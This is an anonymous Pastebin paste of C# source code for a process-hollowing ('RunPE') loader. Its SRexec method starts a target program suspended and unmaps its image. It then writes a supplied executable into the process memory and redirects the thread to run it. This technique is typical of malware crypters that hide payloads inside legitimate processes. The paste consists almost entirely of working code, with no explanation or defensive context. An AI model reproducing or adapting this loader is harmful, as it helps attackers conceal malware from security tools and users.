API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 18th, 2010
1,746
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 18.28 KB | None | 0 0
raw download clone embed print report
  1. using System.Runtime.InteropServices;
  2. using System.Text;
  3. using System;
  4.  
  5. using Microsoft.VisualBasic;
  6.  
  7. namespace dependency
  8. {
  9.     class AB
  10.     {
  11.         [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  12.         public struct STARTUPINFO
  13.         {
  14.             public int cb;
  15.             public string lpReserved;
  16.             public string lpDesktop;
  17.             public string lpTitle;
  18.             public int dwX;
  19.             public int dwY;
  20.             public int dwXSize;
  21.             public int dwYSize;
  22.             public int dwXCountChars;
  23.             public int dwYCountChars;
  24.             public int dwFillAttribute;
  25.             public int dwFlags;
  26.             public short wShowWindow;
  27.             public short cbReserved2;
  28.             public int lpReserved2;
  29.             public int hStdInput;
  30.             public int hStdOutput;
  31.             public int hStdError;
  32.         }
  33.  
  34.         private struct PROCESS_INFORMATION
  35.         {
  36.             public IntPtr hProcess;
  37.             public IntPtr hThread;
  38.             public int dwProcessId;
  39.             public int dwThreadId;
  40.         }
  41.  
  42.         [DllImport("kernel32.dll")]
  43.         private static extern uint ResumeThread(IntPtr hThread);
  44.  
  45.         [DllImport("kernel32.dll")]
  46.         private static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT lpContext);
  47.  
  48.         [DllImport("kernel32.dll")]
  49.         private static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT lpContext);
  50.  
  51.         [DllImport("kernel32.dll")]
  52.         private static extern int LoadLibraryA(string lpLibFileName);
  53.  
  54.         [DllImport("kernel32.dll")]
  55.         private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes,
  56.             bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo,
  57.             ref PROCESS_INFORMATION lpProcessInformation);
  58.  
  59.         [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, EntryPoint = "WriteProcessMemory", CallingConvention = CallingConvention.StdCall)]
  60.         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int64 iSize, ref Int64 lpNumberOfBytesWritten);
  61.  
  62.         [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, EntryPoint = "WriteProcessMemory", CallingConvention = CallingConvention.StdCall)]
  63.         public static extern bool WriteProcessMemoryI(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, Int64 iSize, ref Int64 lpNumberOfBytesWritten);
  64.  
  65.         [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
  66.         public static extern Int64 ReadProcessMemory(IntPtr hProcess, int lpBaseAddress, ref IntPtr lpbuffer, int size, ref int lpNumberOfBytesRead);
  67.  
  68.         [DllImport("ntdll.dll")]
  69.         public static extern long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress);
  70.  
  71.         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
  72.         public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
  73.  
  74.         [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
  75.         public static extern int VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, UIntPtr flNewProtect, [Out()]uint lpflOldProtect);
  76.  
  77.         [StructLayout(LayoutKind.Sequential)]
  78.         private struct IMAGE_DOS_HEADER
  79.         {
  80.             public System.UInt16 e_magic;
  81.             // Magic number
  82.             public System.UInt16 e_cblp;
  83.             // Bytes on last page of file
  84.             public System.UInt16 e_cp;
  85.             // Pages in file
  86.             public System.UInt16 e_crlc;
  87.             // Relocations
  88.             public System.UInt16 e_cparhdr;
  89.             // Size of header in paragraphs
  90.             public System.UInt16 e_minalloc;
  91.             // Minimum extra paragraphs needed
  92.             public System.UInt16 e_maxalloc;
  93.             // Maximum extra paragraphs needed
  94.             public System.UInt16 e_ss;
  95.             // Initial (relative) SS value
  96.             public System.UInt16 e_sp;
  97.             // Initial SP value
  98.             public System.UInt16 e_csum;
  99.             // Checksum
  100.             public System.UInt16 e_ip;
  101.             // Initial IP value
  102.             public System.UInt16 e_cs;
  103.             // Initial (relative) CS value
  104.             public System.UInt16 e_lfarlc;
  105.             // File address of relocation table
  106.             public System.UInt16 e_ovno;
  107.             // Overlay number
  108.             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
  109.             public System.UInt16[] e_res1;
  110.             // Reserved words
  111.             public System.UInt16 e_oemid;
  112.             // OEM identifier (for e_oeminfo)
  113.             public System.UInt16 e_oeminfo;
  114.             // OEM information; e_oemid specific
  115.             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
  116.             public System.UInt16[] e_res2;
  117.             // Reserved words
  118.             public int e_lfanew;
  119.             // File address of new EXE header
  120.         }
  121.  
  122.         [StructLayout(LayoutKind.Sequential)]
  123.         public struct IMAGE_OPTIONAL_HEADER32
  124.         {
  125.             //
  126.             // Standard fields.
  127.             //
  128.             public System.UInt16 Magic;
  129.             public Byte MajorLinkerVersion;
  130.             public Byte MinorLinkerVersion;
  131.             public uint SizeOfCode;
  132.             public uint SizeOfInitializedData;
  133.             public uint SizeOfUninitializedData;
  134.             public uint AddressOfEntryPoint;
  135.             public uint BaseOfCode;
  136.             public uint BaseOfData;
  137.             //
  138.             // NT additional fields.
  139.             //
  140.             public uint ImageBase;
  141.             public uint SectionAlignment;
  142.             public uint FileAlignment;
  143.             public System.UInt16 MajorOperatingSystemVersion;
  144.             public System.UInt16 MinorOperatingSystemVersion;
  145.             public System.UInt16 MajorImageVersion;
  146.             public System.UInt16 MinorImageVersion;
  147.             public System.UInt16 MajorSubsystemVersion;
  148.             public System.UInt16 MinorSubsystemVersion;
  149.             public uint Win32VersionValue;
  150.             public uint SizeOfImage;
  151.             public uint SizeOfHeaders;
  152.             public uint CheckSum;
  153.             public System.UInt16 Subsystem;
  154.             public System.UInt16 DllCharacteristics;
  155.             public uint SizeOfStackReserve;
  156.             public uint SizeOfStackCommit;
  157.             public uint SizeOfHeapReserve;
  158.             public uint SizeOfHeapCommit;
  159.             public uint LoaderFlags;
  160.             public uint NumberOfRvaAndSizes;
  161.             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
  162.             public IMAGE_DATA_DIRECTORY[] DataDirectory;
  163.         }
  164.  
  165.         [StructLayout(LayoutKind.Sequential)]
  166.         public struct IMAGE_FILE_HEADER
  167.         {
  168.             public System.UInt16 Machine;
  169.             public System.UInt16 NumberOfSections;
  170.             public uint TimeDateStamp;
  171.             public uint PointerToSymbolTable;
  172.             public uint NumberOfSymbols;
  173.             public System.UInt16 SizeOfOptionalHeader;
  174.             public System.UInt16 Characteristics;
  175.         }
  176.  
  177.         [StructLayout(LayoutKind.Sequential)]
  178.         public struct IMAGE_DATA_DIRECTORY
  179.         {
  180.             public uint VirtualAddress;
  181.             public uint Size;
  182.         }
  183.  
  184.         public struct IMAGE_NT_HEADERS
  185.         {
  186.             public uint Signature;
  187.             public IMAGE_FILE_HEADER FileHeader;
  188.             public IMAGE_OPTIONAL_HEADER32 OptionalHeader;
  189.         }
  190.  
  191.         public struct IMAGE_SECTION_HEADER
  192.         {
  193.             public System.Byte Name;
  194.             public Misc Misc;
  195.             public uint VirtualAddress;
  196.             public uint SizeOfRawData;
  197.             public uint PointerToRawData;
  198.             public uint PointerToRelocations;
  199.             public uint PointerToLinenumbers;
  200.             public System.UInt16 NumberOfRelocations;
  201.             public System.UInt16 NumberOfLinenumbers;
  202.             public uint Characteristics;
  203.         }
  204.  
  205.         [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  206.         private struct VS_VERSIONINFO
  207.         {
  208.             public System.UInt16 wLength;
  209.             public System.UInt16 wValueLength;
  210.             public System.UInt16 wType;
  211.             [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 15)]
  212.             public string szKey;
  213.             public System.UInt16 Padding1;
  214.         }
  215.  
  216.         [StructLayout(LayoutKind.Sequential)]
  217.         public struct SECURITY_ATTRIBUTES
  218.         {
  219.             public int nLength;
  220.             public IntPtr lpSecurityDescriptor;
  221.             public int bInheritHandle;
  222.         }
  223.  
  224.         [StructLayout(LayoutKind.Sequential)]
  225.         private struct VS_FIXEDFILEINFO
  226.         {
  227.             public uint dwSignature;
  228.             public uint dwStrucVersion;
  229.             public uint dwFileVersionMS;
  230.             public uint dwFileVersionLS;
  231.             public uint dwProductVersionMS;
  232.             public uint dwProductVersionLS;
  233.             public uint dwFileFlagsMask;
  234.             public uint dwFileFlags;
  235.             public uint dwFileOS;
  236.             public uint dwFileType;
  237.             public uint dwFileSubtype;
  238.             public uint dwFileDateMS;
  239.             public uint dwFileDateLS;
  240.         }
  241.  
  242.         [StructLayout(LayoutKind.Sequential)]
  243.         public struct FLOATING_SAVE_AREA
  244.         {
  245.             public uint ControlWord;
  246.             public uint StatusWord;
  247.             public uint TagWord;
  248.             public uint ErrorOffset;
  249.             public uint ErrorSelector;
  250.             public uint DataOffset;
  251.             public uint DataSelector;
  252.             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
  253.             public byte[] RegisterArea;
  254.             public uint Cr0NpxState;
  255.         }
  256.  
  257.         [StructLayout(LayoutKind.Sequential)]
  258.         public struct CONTEXT
  259.         {
  260.             public uint ContextFlags;
  261.             //set this to an appropriate value
  262.             // Retrieved by CONTEXT_DEBUG_REGISTERS
  263.             public uint Dr0;
  264.             public uint Dr1;
  265.             public uint Dr2;
  266.             public uint Dr3;
  267.             public uint Dr6;
  268.             public uint Dr7;
  269.             // Retrieved by CONTEXT_FLOATING_POINT
  270.             public FLOATING_SAVE_AREA FloatSave;
  271.             // Retrieved by CONTEXT_SEGMENTS
  272.             public uint SegGs;
  273.             public uint SegFs;
  274.             public uint SegEs;
  275.             public uint SegDs;
  276.             // Retrieved by CONTEXT_INTEGER
  277.             public uint Edi;
  278.             public uint Esi;
  279.             public uint Ebx;
  280.             public uint Edx;
  281.             public uint Ecx;
  282.             public uint Eax;
  283.             // Retrieved by CONTEXT_CONTROL
  284.             public uint Ebp;
  285.             public uint Eip;
  286.             public uint SegCs;
  287.             public uint EFlags;
  288.             public uint Esp;
  289.             public uint SegSs;
  290.             // Retrieved by CONTEXT_EXTENDED_REGISTERS
  291.             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
  292.             public byte[] ExtendedRegisters;
  293.         }
  294.  
  295.         public enum IMAGE_SIZEOF_SHORT_NAME
  296.         {
  297.             IMAGE_SIZEOF_SHORT_NAME = 8
  298.         }
  299.  
  300.         public struct Misc
  301.         {
  302.             public uint PhysicalAddress;
  303.             public uint VirtualSize;
  304.         }
  305.  
  306.         public const uint CONTEXT_X86 = 0x10000;
  307.         public const uint CONTEXT86_CONTROL = (CONTEXT_X86 | 0x1);
  308.  
  309.         //SS:SP, CS:IP, FLAGS, BP
  310.         public const uint CONTEXT86_INTEGER = (CONTEXT_X86 | 0x2);
  311.  
  312.         //AX, BX, CX, DX, SI, DI
  313.         public const uint CONTEXT86_SEGMENTS = (CONTEXT_X86 | 0x4);
  314.  
  315.         //DS, ES, FS, GS
  316.         public const uint CONTEXT86_FLOATING_POINT = (CONTEXT_X86 | 0x8);
  317.  
  318.         //387 state
  319.         public const uint CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 | 0x10);
  320.  
  321.         //DB 0-3,6,7
  322.         public const uint CONTEXT86_FULL = (CONTEXT86_CONTROL | CONTEXT86_INTEGER | CONTEXT86_SEGMENTS);
  323.         public const uint CREATE_SUSPENDED = 0x4;
  324.  
  325.         public const long MEM_COMMIT = 0x1000L;
  326.         public const long MEM_RESERVE = 0x2000L;
  327.         public const uint PAGE_NOCACHE = 0x200;
  328.         public const uint PAGE_EXECUTE_READWRITE = 0x40;
  329.         public const uint PAGE_EXECUTE_WRITECOPY = 0x80;
  330.         public const uint PAGE_EXECUTE_READ = 0x20;
  331.         public const uint PAGE_EXECUTE = 0x10;
  332.         public const uint PAGE_WRITECOPY = 0x8;
  333.         public const uint PAGE_NOACCESS = 0x1;
  334.         public const uint PAGE_READWRITE = 0x4;
  335.  
  336.         const uint GENERIC_READ = 0x80000000;
  337.         const uint FILE_SHARE_READ = 0x1;
  338.         const uint OPEN_EXISTING = 3;
  339.         const uint FILE_ATTRIBUTE_NORMAL = 0x80;
  340.         const Int64 INVALID_HANDLE_VALUE = -1;
  341.         const uint PAGE_READONLY = 0x2;
  342.         const uint FILE_MAP_READ = 0x4;
  343.         const uint IMAGE_DOS_SIGNATURE = 0x5a4d;
  344.         const Int64 RT_VERSION = 16;
  345.  
  346.         private enum ImageSignatureTypes : uint
  347.         {
  348.             IMAGE_DOS_SIGNATURE = 0x5a4d,
  349.             //'\\ MZ
  350.             IMAGE_OS2_SIGNATURE = 0x454e,
  351.             //'\\ NE
  352.             IMAGE_OS2_SIGNATURE_LE = 0x454c,
  353.             //'\\ LE
  354.             IMAGE_VXD_SIGNATURE = 0x454c,
  355.             //'\\ LE
  356.             IMAGE_NT_SIGNATURE = 0x4550
  357.             //'\\ PE00
  358.         }
  359.  
  360.         public static void SRexec(byte[] b, string sTarget)
  361.         {
  362.             String sVersion = null;
  363.             IMAGE_DOS_HEADER pidh = default(IMAGE_DOS_HEADER);
  364.             CONTEXT context = new CONTEXT();
  365.  
  366.             IMAGE_NT_HEADERS Pinh = default(IMAGE_NT_HEADERS);
  367.             IMAGE_SECTION_HEADER Pish = default(IMAGE_SECTION_HEADER);
  368.  
  369.             PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
  370.             STARTUPINFO si = new STARTUPINFO();
  371.  
  372.             SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
  373.             SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
  374.  
  375.            
  376.             GCHandle MyGC = GCHandle.Alloc(b, GCHandleType.Pinned);
  377.             long ptbuffer = MyGC.AddrOfPinnedObject().ToInt64();
  378.  
  379.             pidh = (IMAGE_DOS_HEADER)Marshal.PtrToStructure(MyGC.AddrOfPinnedObject(), pidh.GetType());
  380.             MyGC.Free();
  381.  
  382.             if (!CreateProcess(null, sTarget, ref pSec, ref tSec, false, 0x4, new System.IntPtr(), null, ref si, ref pi))
  383.             {
  384.                 return;
  385.             }
  386.  
  387.             long vt = ptbuffer + pidh.e_lfanew;
  388.             Pinh = (IMAGE_NT_HEADERS)Marshal.PtrToStructure(new IntPtr(vt), Pinh.GetType());
  389.  
  390.             IntPtr addr = new IntPtr();
  391.             long lOffset = 0;
  392.             long ret = 0;
  393.  
  394.             //si.cb = Strings.Len(si);
  395.  
  396.             context.ContextFlags = CONTEXT86_INTEGER;
  397.  
  398.            
  399.             if (Pinh.Signature != (uint)ImageSignatureTypes.IMAGE_NT_SIGNATURE || pidh.e_magic != (uint)ImageSignatureTypes.IMAGE_DOS_SIGNATURE)
  400.                 return;
  401.  
  402.             int lpNumberOfBytesRead = 0;
  403.             if (GetThreadContext(pi.hThread, ref context) &
  404.                 ReadProcessMemory(pi.hProcess, (int)context.Ebx + 8, ref addr, 4, ref lpNumberOfBytesRead) >= 0 &
  405.                 ZwUnmapViewOfSection(pi.hProcess, addr) >= 0)
  406.             {
  407.  
  408.                 Int64 ImageBase = VirtualAllocEx(pi.hProcess, new IntPtr(Pinh.OptionalHeader.ImageBase), Pinh.OptionalHeader.SizeOfImage, (uint)(MEM_RESERVE | MEM_COMMIT), (uint)PAGE_READWRITE).ToInt64();
  409.                 if (ImageBase != 0)
  410.                 {
  411.                     WriteProcessMemory(pi.hProcess, new IntPtr(ImageBase), b, (long)Pinh.OptionalHeader.SizeOfHeaders, ref ret);
  412.  
  413.                     lOffset = pidh.e_lfanew + 248;
  414.                     for (int i = 0; i <= Pinh.FileHeader.NumberOfSections - 1; i++)
  415.                     {
  416.                        
  417.                         Pish = (IMAGE_SECTION_HEADER)Marshal.PtrToStructure(new IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType());
  418.  
  419.                         byte[] braw = new byte[Pish.SizeOfRawData + 1];
  420.                        
  421.                         for (int j = 0; j <= Pish.SizeOfRawData - 1; j++)
  422.                         {
  423.                             braw[j] = b[Pish.PointerToRawData + j];
  424.                         }
  425.  
  426.                         WriteProcessMemory(pi.hProcess, new IntPtr(ImageBase + Pish.VirtualAddress), braw, (int)Pish.SizeOfRawData, ref ret);
  427.  
  428.                         VirtualProtectEx(pi.hProcess, new IntPtr(ImageBase + Pish.VirtualAddress),
  429.                             new UIntPtr(Pish.Misc.VirtualSize), new UIntPtr((uint)Protect(Pish.Characteristics)), (uint)addr.ToInt64());
  430.                     }
  431.  
  432.                     byte[] bb = BitConverter.GetBytes(ImageBase);
  433.  
  434.                     WriteProcessMemory(pi.hProcess, new IntPtr(context.Ebx + 8), bb, 4, ref ret);
  435.  
  436.                     context.Eax = (uint)ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint;
  437.  
  438.                     SetThreadContext(pi.hThread, ref context);
  439.                     ResumeThread(pi.hThread);
  440.                 }
  441.             }
  442.         }
  443.  
  444.         private static long Protect(long characteristics)
  445.         {
  446.             object[] mapping = { PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE };
  447.  
  448.             long index = RShift(characteristics, 29);
  449.  
  450.             string mappingS = mapping[index].ToString();
  451.             long resultLong = 0;
  452.             if (long.TryParse(mappingS, out resultLong))
  453.                 return resultLong;
  454.  
  455.             return 0;
  456.         }
  457.  
  458.         private static long RShift(long lValue, long lNumberOfBitsToShift)
  459.         {
  460.             double result = vbLongToULong(lValue) / (Math.Pow(2, lNumberOfBitsToShift));
  461.             return (long)result;
  462.         }
  463.         private static double vbLongToULong(long Value)
  464.         {
  465.             double functionReturnValue = 0;
  466.             const double OFFSET_4 = 4294967296.0;
  467.             if (Value < 0)
  468.             {
  469.                 functionReturnValue = Value + OFFSET_4;
  470.             }
  471.             else
  472.             {
  473.                 functionReturnValue = Value;
  474.             }
  475.             return functionReturnValue;
  476.         }
  477.     }
  478. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!